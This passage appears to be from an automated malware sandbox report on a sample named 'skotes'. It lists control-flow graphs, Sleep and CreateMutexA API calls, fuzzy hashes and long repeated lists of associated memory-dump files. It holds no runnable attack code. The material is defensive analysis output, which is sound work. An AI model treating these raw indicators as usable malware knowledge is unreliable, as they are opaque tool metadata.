                                                                                                                                                                                                                                                              • Instruction ID: e5945a847b28da3ae942fb80b77d97c2b92f12956e3be2d00bdc36da3afab60b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbff7010e4aff98552d0a5026c42e7de246ec93b9eeb13d04804691d6f36d1a0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D3129317042048BEB18AB68DC857ADB7A6EBCB314F249629E014FF2D5D7766981C712

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 56 eaa079-eaa099 60 eaa09b-eaa0a7 56->60 61 eaa0c7-eaa0e3 56->61 62 eaa0a9-eaa0b7 60->62 63 eaa0bd-eaa0c4 call ebd663 60->63 64 eaa111-eaa130 61->64 65 eaa0e5-eaa0f1 61->65 62->63 66 eaa930-eaa994 call ed6c6a Sleep CreateMutexA 62->66 63->61 70 eaa15e-eaa916 call eb80c0 64->70 71 eaa132-eaa13e 64->71 68 eaa0f3-eaa101 65->68 69 eaa107-eaa10e call ebd663 65->69 86 eaa996-eaa998 66->86 87 eaa9a7-eaa9a8 66->87 68->66 68->69 69->64 76 eaa140-eaa14e 71->76 77 eaa154-eaa15b call ebd663 71->77 76->66 76->77 77->70 86->87 88 eaa99a-eaa9a5 86->88 88->87
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00EAA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00F03254), ref: 00EAA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1747399755.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747368388.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747399755.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747494405.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747526417.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747556586.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747584320.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747611318.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747782150.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747808925.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747844806.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747872445.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747955076.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747983085.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748012236.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748041127.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748072207.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748100281.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748129827.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748162195.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748203595.00000000010C6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748235102.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748263519.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748291851.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748323826.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748353642.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748381998.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748410518.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748438094.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748469298.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748496878.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748524293.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748551601.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748579015.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748601479.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748620342.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748638394.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748656500.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748673938.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748693881.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748715245.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748733390.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748752057.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748770761.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748793044.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748811807.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748829820.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748847354.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748872575.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748947527.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748997514.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749045528.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749088386.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749122409.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749144178.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749163814.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: b23eb7add3603740528bf796c33d948dbfbefa62334eeffffaabad256c44e23e
                                                                                                                                                                                                                                                              • Instruction ID: 3170b0a921f3913a75a2ba5bb26c25a6476c5864dd83894e97ce1a11ef497d48
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b23eb7add3603740528bf796c33d948dbfbefa62334eeffffaabad256c44e23e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 143139716042009BEB089F6CDCC57AEB7A2DBCB314F285629E014FF3D5C7766980C612

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 90 eaa1ae-eaa1ce 94 eaa1fc-eaa218 90->94 95 eaa1d0-eaa1dc 90->95 98 eaa21a-eaa226 94->98 99 eaa246-eaa265 94->99 96 eaa1de-eaa1ec 95->96 97 eaa1f2-eaa1f9 call ebd663 95->97 96->97 104 eaa935 96->104 97->94 100 eaa228-eaa236 98->100 101 eaa23c-eaa243 call ebd663 98->101 102 eaa293-eaa916 call eb80c0 99->102 103 eaa267-eaa273 99->103 100->101 100->104 101->99 107 eaa289-eaa290 call ebd663 103->107 108 eaa275-eaa283 103->108 110 eaa953-eaa994 Sleep CreateMutexA 104->110 111 eaa935 call ed6c6a 104->111 107->102 108->104 108->107 120 eaa996-eaa998 110->120 121 eaa9a7-eaa9a8 110->121 111->110 120->121 122 eaa99a-eaa9a5 120->122 122->121
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00EAA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00F03254), ref: 00EAA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1747399755.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747368388.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747399755.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747494405.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747526417.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747556586.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747584320.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747611318.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747782150.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747808925.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747844806.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747872445.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747955076.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747983085.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748012236.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748041127.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748072207.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748100281.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748129827.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748162195.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748203595.00000000010C6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748235102.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748263519.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748291851.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748323826.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748353642.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748381998.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748410518.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748438094.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748469298.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748496878.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748524293.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748551601.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748579015.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748601479.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748620342.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748638394.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748656500.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748673938.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748693881.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748715245.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748733390.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748752057.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748770761.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748793044.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748811807.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748829820.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748847354.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748872575.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748947527.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748997514.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749045528.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749088386.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749122409.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749144178.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749163814.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: 06c92d71798471ad78fec6195dd11b9922a519e523d5a70ea9676306fe71b689
                                                                                                                                                                                                                                                              • Instruction ID: 48b6f404e1488044b01af0492442b2c27c4a24c9b5ff9096fa37e0ed0b0add3a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 06c92d71798471ad78fec6195dd11b9922a519e523d5a70ea9676306fe71b689
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19313C716042009BFB189F6CDC897ADB7A2EBCB314F285629E004FF3D5D7756980C622

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 124 eaa418-eaa438 128 eaa43a-eaa446 124->128 129 eaa466-eaa482 124->129 130 eaa448-eaa456 128->130 131 eaa45c-eaa463 call ebd663 128->131 132 eaa4b0-eaa4cf 129->132 133 eaa484-eaa490 129->133 130->131 136 eaa93f-eaa949 call ed6c6a * 2 130->136 131->129 134 eaa4fd-eaa916 call eb80c0 132->134 135 eaa4d1-eaa4dd 132->135 138 eaa492-eaa4a0 133->138 139 eaa4a6-eaa4ad call ebd663 133->139 140 eaa4df-eaa4ed 135->140 141 eaa4f3-eaa4fa call ebd663 135->141 155 eaa94e 136->155 156 eaa949 call ed6c6a 136->156 138->136 138->139 139->132 140->136 140->141 141->134 157 eaa953-eaa994 Sleep CreateMutexA 155->157 158 eaa94e call ed6c6a 155->158 156->155 160 eaa996-eaa998 157->160 161 eaa9a7-eaa9a8 157->161 158->157 160->161 162 eaa99a-eaa9a5 160->162 162->161
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00EAA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00F03254), ref: 00EAA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1747399755.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747368388.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747399755.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747494405.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747526417.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747556586.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747584320.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747611318.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747782150.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747808925.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747844806.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747872445.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747955076.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747983085.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748012236.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748041127.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748072207.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748100281.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748129827.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748162195.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748203595.00000000010C6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748235102.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748263519.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748291851.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748323826.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748353642.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748381998.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748410518.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748438094.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748469298.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748496878.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748524293.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748551601.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748579015.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748601479.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748620342.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748638394.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748656500.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748673938.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748693881.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748715245.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748733390.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748752057.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748770761.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748793044.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748811807.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748829820.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748847354.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748872575.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748947527.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
